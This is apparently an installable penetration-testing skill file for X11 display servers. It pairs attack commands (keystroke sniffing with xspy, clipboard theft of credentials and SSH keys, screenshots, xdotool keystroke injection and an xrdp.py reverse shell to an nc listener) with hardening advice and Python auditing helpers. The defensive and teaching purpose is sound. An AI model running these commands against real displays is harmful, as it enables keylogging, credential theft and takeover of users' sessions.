pentesting-x11

$ npx mdskill add xalgord/xalgorix/pentesting-x11

---
name: pentesting-x11
description: Testing the X Window System (X11) display server during authorized engagements. X11 listens on TCP
  6000+<display> and the local Unix socket /tmp/.X11-unix/X<display>. Covers detecting unauthenticated ("xhost +")
  access with nmap NSE and Metasploit, abusing MIT-MAGIC-COOKIE-1 auth tokens from ~/.Xauthority, window/clipboard
  enumeration, keystroke sniffing (xspy), screenshotting (xwd), live shadowing, and keystroke injection (xdotool) for
  command execution.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- x11
- linux
- keylogging
- remote-desktop
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting X11 (port 6000)

## When to Use

- During authorized assessments when TCP 6000+ is open (X11 display server)
- When testing for unauthenticated X11 access (`xhost +` style misconfiguration)
- When you have a local foothold and can read a valid `~/.Xauthority` cookie
- When you want screenshots, clipboard contents, keystroke capture, or input injection from an X session
- When pivoting from a captured display to command execution on the host

## Quick Enumeration

```bash
# Check for anonymous (open) X11 access
nmap -sV --script x11-access -p 6000 <IP>
msf> use auxiliary/scanner/x11/open_x11

# Local triage (post-foothold) — find DISPLAY and cookie
echo "$DISPLAY"
ls -lah /tmp/.X11-unix/
ps -efww | grep -E '[X]org|[X]wayland'      # look for -auth <file> in cmdline
xauth info
xauth list

# Shodan-style discovery
# port:6000 x11
```

## Critical: Checks Most Often Missed

1. **Open X11 (no auth)** — `xhost +` or open access control lets any host connect to display :0 with no token. Confirm with `x11-access` / `open_x11`, then enumerate windows directly.
2. **MIT-MAGIC-COOKIE-1 reuse** — the 128-bit cookie in `~/.Xauthority` is sent in plaintext and grants full access. If you can read the file (or another user's), export `XAUTHORITY=/path/to/.Xauthority` and connect.
3. **Cookie via Xorg `-auth` argument** — the X server's command line often reveals the authoritative auth file path (`ps -efww | grep Xorg`), readable with sufficient privileges.
4. **Access ≠ "just graphics"** — a connected display enables window enumeration, clipboard theft, screenshots, keystroke sniffing, and input injection (effectively RCE in the user's session).
5. **Unix socket foothold** — even when 6000/tcp is closed, a local foothold + valid cookie abuses `/tmp/.X11-unix/X<display>`.
6. **XSendEvent ignored** — apps often drop injected events sent to a specific window; activate the window first, then inject normal key events for reliability.

How to CONFIRM: open access is confirmed when `xdpyinfo -display <IP>:0` or `xwininfo -root -tree -display <IP>:0` returns display/window data without an auth error. With a cookie, confirm by setting `XAUTHORITY` and running the same command successfully.
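Checks 2 and 3 turn on what an auth file actually contains. The following is an added example, not part of this skill: a parser for the `.Xauthority` binary format (the layout libXau writes: a big-endian u16 family, then four u16-length-prefixed strings for address, display number, protocol name and auth data), plus an audit pass that flags the entries a hardening review cares about, such as wildcard-family cookies, cookies for TCP-reachable displays and MIT-MAGIC-COOKIE-1 values that are not 128 bits. Family codes are those from X.h/Xauth.h; the sample records and cookie bytes are constructed.

```python
"""Parse and audit ~/.Xauthority records (MIT-MAGIC-COOKIE-1 cookies).

Added example; not part of the original skill. Record layout follows libXau:
u16 family (big-endian), then four length-prefixed (u16 big-endian) byte
strings: address, display number, auth-protocol name, auth data.
"""
import struct

# Family codes from X.h / Xauth.h.
FAMILY_NAMES = {
    0: "Internet",      # IPv4 address, 4 raw bytes
    6: "Internet6",     # IPv6 address, 16 raw bytes
    252: "LocalHost",
    254: "Netname",
    256: "Local",       # Unix socket; address is the hostname
    65535: "Wild",      # matches any host: a cookie offered to every client
}
MIT_COOKIE = "MIT-MAGIC-COOKIE-1"


def _read_counted(buf: bytes, off: int):
    """Read one u16-length-prefixed string; return (bytes, new offset)."""
    if off + 2 > len(buf):
        raise ValueError("truncated .Xauthority record")
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("truncated .Xauthority record")
    return buf[off:off + n], off + n


def _format_display(family: int, address: bytes, number: bytes) -> str:
    """Render the record the way `xauth list` does (host/unix:N, a.b.c.d:N)."""
    num = number.decode("ascii", "replace")
    if family == 256:
        return f"{address.decode('ascii', 'replace')}/unix:{num}"
    if family == 0 and len(address) == 4:
        return ".".join(str(b) for b in address) + f":{num}"
    if family == 65535:
        return f"*:{num}"
    return f"{address.hex()}:{num}"


def parse_xauthority(data: bytes) -> list:
    """Return one dict per record, in file order; ValueError on truncation."""
    records, off = [], 0
    while off < len(data):
        if off + 2 > len(data):
            raise ValueError("truncated .Xauthority record")
        (family,) = struct.unpack_from(">H", data, off)
        off += 2
        address, off = _read_counted(data, off)
        number, off = _read_counted(data, off)
        name, off = _read_counted(data, off)
        cookie, off = _read_counted(data, off)
        records.append({
            "family": FAMILY_NAMES.get(family, f"unknown({family})"),
            "display": _format_display(family, address, number),
            "name": name.decode("ascii", "replace"),
            "cookie": cookie,
        })
    return records


def audit_xauthority(records: list) -> list:
    """Findings a hardening review of the auth file would report."""
    findings = []
    for r in records:
        d = r["display"]
        if r["family"] == "Wild":
            findings.append(f"{d}: wildcard family, cookie is offered to any host")
        if r["family"] in ("Internet", "Internet6"):
            findings.append(f"{d}: cookie for a TCP-reachable display (is 6000+N needed?)")
        if r["name"] == MIT_COOKIE and len(r["cookie"]) != 16:
            findings.append(f"{d}: MIT-MAGIC-COOKIE-1 is {len(r['cookie']) * 8} bits, expected 128")
        if r["name"] != MIT_COOKIE:
            findings.append(f"{d}: unexpected auth protocol {r['name']!r}")
    return findings


def build_record(family: int, address: bytes, number: str, name: str, cookie: bytes) -> bytes:
    """Serialise one record (used only to build the constructed sample file)."""
    def counted(b: bytes) -> bytes:
        return struct.pack(">H", len(b)) + b
    return (struct.pack(">H", family) + counted(address)
            + counted(number.encode()) + counted(name.encode()) + counted(cookie))


# Constructed sample: a normal local entry plus a wildcard entry with a short
# cookie. The cookie bytes are made up for the example.
SAMPLE_XAUTHORITY = (
    build_record(256, b"workstation", "0", MIT_COOKIE, bytes(range(16)))
    + build_record(65535, b"", "1", MIT_COOKIE, b"\x01\x02\x03\x04")
)

if __name__ == "__main__":
    recs = parse_xauthority(SAMPLE_XAUTHORITY)
    for r in recs:
        print(f'{r["display"]:24} {r["name"]:20} {r["cookie"].hex()}')
    for f in audit_xauthority(recs):
        print("FINDING:", f)
```

To audit a real file, pass `open(path, "rb").read()` to `parse_xauthority`; the output should agree line for line with `xauth -f <path> list`. The truncation checks matter because a partially written or copied file otherwise yields a plausible-looking but wrong last record.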

## Workflow

### Step 1: Enumerate (detect, find display + cookie)

```bash
# Remote anonymous check
nmap -sV --script x11-access -p 6000 <IP>

# Local: identify the active display and session
w                                            # shows DISPLAY (e.g. :0) and WHAT
echo "$DISPLAY"; ls -lah /tmp/.X11-unix/
xauth list                                   # cookies known to this user

# Use a cookie you obtained
export XAUTHORITY=/path/to/.Xauthority
```

### Step 2: Authenticate / connect and inspect the display

```bash
# Display + screen info confirms access
xdpyinfo -display <IP>:<display>
xwininfo -root -tree -display <IP>:<display>     # window tree + IDs

# Follow-up enumeration
xlsclients -display <IP>:<display>
xprop -root _NET_ACTIVE_WINDOW -display <IP>:<display>
xinput --list --display <IP>:<display>
```

### Step 3: Exploit / Extract (sniff, clipboard, screenshot)

```bash
# Keystroke sniffing
xspy <IP>:<display>
xinput --test_xi2 --display <IP>:<display>       # monitor input events

# Clipboard theft (credentials, tokens, SSH keys, password-manager pastes)
xclip -display <IP>:<display> -selection clipboard -o
xsel  --display <IP>:<display> --clipboard --output

# Screenshot the root window
xwd -root -screen -silent -display <IP>:0 > screenshot.xwd
convert screenshot.xwd screenshot.png

# Live shadowing of a window / display
xwininfo -root -display <IP>:0                   # get window ID (e.g. 0x45)
./xwatchwin <IP>:0 -w 0x45                       # live view
xpra shadow :0                                   # maintained alternative
```

### Step 4: Post-access / command execution

```bash
# Keystroke injection -> run commands in the user's session
WID=$(xdotool search --onlyvisible --name '.*' | head -n 1)
xdotool windowactivate --sync "$WID"
xdotool type --delay 50 'xterm &'
xdotool key Return
# (activating the window first beats XSendEvent filtering)

# Metasploit keyboard-exec module
msf> use exploit/unix/x11/x11_keyboard_exec

# xrdp.py command exec / reverse shell over X11
./xrdp.py <IP>:0
./xrdp.py <IP>:0 --no-disp                        # then use R-Shell to a nc listener
nc -lvp 5555
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **X11 / X Window System** | Network-capable windowing system for UNIX-like OSes |
| **Display number** | Maps to TCP 6000 + display and Unix socket /tmp/.X11-unix/X<display> |
| **MIT-MAGIC-COOKIE-1** | 128-bit shared secret in ~/.Xauthority sent plaintext to authorize clients |
| **XAUTHORITY** | Env var pointing to the auth cookie file |
| **xhost access control** | Host-based ACL; `xhost +` disables it (open access) |
| **Input injection** | Sending synthetic key/mouse events (xdotool) to the session |
| **XSendEvent filtering** | Apps ignore synthetic events targeted at a window; activate-then-type instead |
| **Shadowing** | Live viewing/control of a display via xwatchwin / xpra |
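The display-number row of the table is the mapping everything else depends on, so here is an added example (not the skill's own code) that resolves a `DISPLAY` string to the endpoint a client will open: TCP 6000 + N when a host is given, the Unix socket `/tmp/.X11-unix/XN` when the host part is empty or the literal `unix`. It handles the `[host]:display[.screen]` syntax including bracketed IPv6 literals; the helper for the 6000-6010 range and the sample values in the demo are constructed for illustration.

```python
"""Resolve an X11 DISPLAY string to the endpoint a client will actually open.

Added example, not code from the original skill. Display N maps to TCP
6000 + N when a host is given, and to /tmp/.X11-unix/XN for local transport.
"""
from dataclasses import dataclass
from typing import Optional

X11_BASE_PORT = 6000
X11_SOCKET_DIR = "/tmp/.X11-unix"


@dataclass(frozen=True)
class DisplaySpec:
    host: Optional[str]   # None means no host part (local transport)
    display: int
    screen: int = 0

    @property
    def is_local(self) -> bool:
        """Empty host or the 'unix' pseudo-host selects the Unix socket."""
        return self.host is None or self.host == "unix"

    @property
    def tcp_port(self) -> int:
        return X11_BASE_PORT + self.display

    @property
    def socket_path(self) -> str:
        return f"{X11_SOCKET_DIR}/X{self.display}"

    def endpoint(self) -> str:
        """What to firewall, or to look for in `ss -ltn` / `ls /tmp/.X11-unix`."""
        if self.is_local:
            return self.socket_path
        host = f"[{self.host}]" if ":" in self.host else self.host
        return f"{host}:{self.tcp_port}"


def parse_display(value: str) -> DisplaySpec:
    """Parse ':0', 'host:10.0', '[::1]:1' or 'unix:0'; ValueError otherwise."""
    s = value.strip()
    if s.startswith("["):                       # bracketed IPv6 literal
        end = s.find("]")
        if end < 0 or not s[end + 1:].startswith(":"):
            raise ValueError(f"bad DISPLAY {value!r}")
        host, rest = s[1:end], s[end + 2:]
    else:
        host, sep, rest = s.rpartition(":")
        if not sep:
            raise ValueError(f"bad DISPLAY {value!r}: missing ':display'")
    num, _, scr = rest.partition(".")
    if not num.isdigit() or (scr and not scr.isdigit()):
        raise ValueError(f"bad DISPLAY {value!r}: display/screen must be numeric")
    return DisplaySpec(host or None, int(num), int(scr) if scr else 0)


def display_tcp_ports(max_display: int = 10) -> list:
    """TCP ports for displays :0 .. :max_display (the 6000-6010 range by default)."""
    return [X11_BASE_PORT + n for n in range(max_display + 1)]


if __name__ == "__main__":
    # Constructed sample values.
    for sample in (":0", "localhost:10.0", "192.0.2.10:1", "[::1]:2", "unix:0"):
        spec = parse_display(sample)
        kind = "unix socket" if spec.is_local else "tcp"
        print(f"{sample:18} -> {kind:11} {spec.endpoint()}  (screen {spec.screen})")
```

Note that `localhost:10.0`, the value SSH X11 forwarding typically sets, resolves to TCP 6010 on loopback rather than to the Unix socket, which is why the hardening advice later on the page talks about the whole 6000-6010 range and not just 6000.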

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **nmap** (x11-access) | Detect unauthenticated X11 access |
| **Metasploit open_x11 / x11_keyboard_exec** | Detect open displays and inject commands |
| **xauth** | Inspect/manage MIT-MAGIC-COOKIE auth tokens |
| **xdpyinfo / xwininfo / xlsclients / xinput** | Display, window, client, and input enumeration |
| **xspy** | Keystroke sniffing on a connected display |
| **xclip / xsel** | Read clipboard/primary selection contents |
| **xwd + convert** | Capture and convert screenshots |
| **xwatchwin / xpra** | Live window/display shadowing |
| **xdotool** | Keystroke/mouse injection for command execution |

## Common Scenarios

### Scenario 1: Open Display Screenshot
`nmap --script x11-access` flags display :0 as open. `xwd -root -display <IP>:0` captures the desktop, exposing an open terminal and a password manager window.

### Scenario 2: Cookie Reuse
A readable `~/.Xauthority` is pulled from a foothold. Setting `XAUTHORITY` and running `xdpyinfo` confirms access; `xspy` then captures the user typing a sudo password.

### Scenario 3: Clipboard Secret Theft
Connected to a display, `xclip -selection clipboard -o` returns a freshly copied SSH private key, reused to authenticate to other hosts.

### Scenario 4: Input Injection to RCE
With access to display :0, `xdotool` activates a visible window and types commands to spawn a reverse shell, turning display access into code execution in the user's session.

## Output Format

```
## X11 Finding

**Service**: X Window System (X11)
**Severity**: <Critical|High|Medium>
**Host**: <IP>:6000 (display :<n>)
**Access**: <open/no-auth | cookie-reuse>

### Summary
<What was found: open display, reusable cookie, keystroke capture, clipboard theft, RCE via injection>

### Evidence
- Command: <nmap / xdpyinfo / xspy / xclip / xdotool>
- Output: <display info, sniffed keystrokes (redacted), screenshot path>

### Impact Demonstrated
| Capability | Result |
|------------|--------|
| Screenshot | desktop captured |
| Keylogging | credentials observed |
| Input injection | command executed in user session |

### Recommendation
1. Never disable X11 access control (`xhost +`); use cookie-based auth only
2. Tunnel X11 over SSH (X11 forwarding) instead of exposing TCP 6000
3. Disable the X server TCP listener (`-nolisten tcp`) where not required
4. Protect ~/.Xauthority files and restrict the Xorg -auth file permissions
5. Firewall ports 6000-6010 from untrusted networks
```
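The workflow steps above and the Recommendation list in the report template describe the same exposure from two sides. As an added example (not part of this skill), the script below audits a host against those recommendations using only text you would collect there: the Xorg command line from `ps -efww` (looking for `-listen tcp`, `-nolisten tcp`, `-ac` and the `-auth` file), the first line of `xhost` output, the mode of the auth file, and `ss -ltn` lines for X11 ports bound off loopback. `-ac`, `-listen` and `-nolisten` are real Xorg options; the column layout assumed for `ss -ltn` is the usual one (state, queues, local address:port, peer). All sample inputs are constructed.

```python
"""Host-side audit of an X server's exposure, mirroring the Recommendation list.

Added example, not the skill's own tooling. Each check is a pure function over
captured output, so it runs offline; sample inputs below are constructed.
"""
import shlex
import stat

X11_PORTS = range(6000, 6064)        # displays :0 .. :63
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def check_xorg_cmdline(cmdline: str) -> list:
    """Flag -listen tcp, a missing -nolisten tcp, and -ac (no access control)."""
    argv = shlex.split(cmdline)
    pairs = {(a, argv[i + 1]) for i, a in enumerate(argv[:-1])}
    findings = []
    if ("-listen", "tcp") in pairs:
        findings.append("Xorg: TCP listener explicitly enabled with '-listen tcp'")
    elif ("-nolisten", "tcp") not in pairs:
        findings.append("Xorg: no '-nolisten tcp'; confirm 6000+N is not bound (ss -ltn)")
    if "-ac" in argv:
        findings.append("Xorg: '-ac' disables host-based access control for every client")
    return findings


def xorg_auth_file(cmdline: str):
    """Path given to -auth, the file whose permissions recommendation 4 is about."""
    argv = shlex.split(cmdline)
    for i, a in enumerate(argv[:-1]):
        if a == "-auth":
            return argv[i + 1]
    return None


def check_xhost(output: str) -> list:
    """`xhost` with no arguments prints the ACL state, then one entry per line."""
    lines = [ln.strip() for ln in output.splitlines() if ln.strip()]
    findings = []
    if lines and lines[0].startswith("access control disabled"):
        findings.append("xhost: access control disabled ('xhost +'), any host may connect")
    for entry in lines[1:]:
        if entry.startswith(("INET:", "INET6:")):
            findings.append(f"xhost: host-based allow entry {entry} (any user on that host)")
    return findings


def check_auth_file_mode(mode: int) -> list:
    """~/.Xauthority (or the Xorg -auth file) must not be group/world accessible."""
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        return [f"auth file: mode {stat.S_IMODE(mode):04o} is group/world accessible"]
    return []


def check_listeners(ss_output: str) -> list:
    """Parse `ss -ltn` lines and flag X11 ports bound to a non-loopback address."""
    findings = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 4 or cols[0] != "LISTEN":
            continue
        addr, _, port = cols[3].rpartition(":")
        addr = addr.strip("[]")
        if port.isdigit() and int(port) in X11_PORTS and addr not in LOOPBACK:
            findings.append(f"listener: display :{int(port) - 6000} bound on {cols[3]}")
    return findings


def audit_x_exposure(cmdline: str, xhost_output: str, auth_mode: int, ss_output: str) -> list:
    """Run every check and return the combined findings list (empty = hardened)."""
    return (check_xorg_cmdline(cmdline) + check_xhost(xhost_output)
            + check_auth_file_mode(auth_mode) + check_listeners(ss_output))


# Constructed sample: a misconfigured workstation.
SAMPLE_CMDLINE = "/usr/lib/xorg/Xorg :0 -auth /var/run/lightdm/root/:0 -listen tcp -ac"
SAMPLE_XHOST = """access control disabled, clients can connect from any host
INET:192.0.2.50
SI:localuser:alice
"""
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:6000        0.0.0.0:*
LISTEN 0      128    127.0.0.1:6010      0.0.0.0:*
LISTEN 0      128    [::]:22             [::]:*
"""
SAMPLE_AUTH_MODE = stat.S_IFREG | 0o644

if __name__ == "__main__":
    for f in audit_x_exposure(SAMPLE_CMDLINE, SAMPLE_XHOST, SAMPLE_AUTH_MODE, SAMPLE_SS):
        print("FINDING:", f)
    print("auth file to check:", xorg_auth_file(SAMPLE_CMDLINE))
```

An empty findings list is the target state: `-nolisten tcp` on the server, `xhost` reporting access control enabled with only `SI:localuser:` entries, a 0600 auth file, and no 6000-range listener outside loopback (the loopback 6010 in the sample is what SSH X11 forwarding looks like and is left alone).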
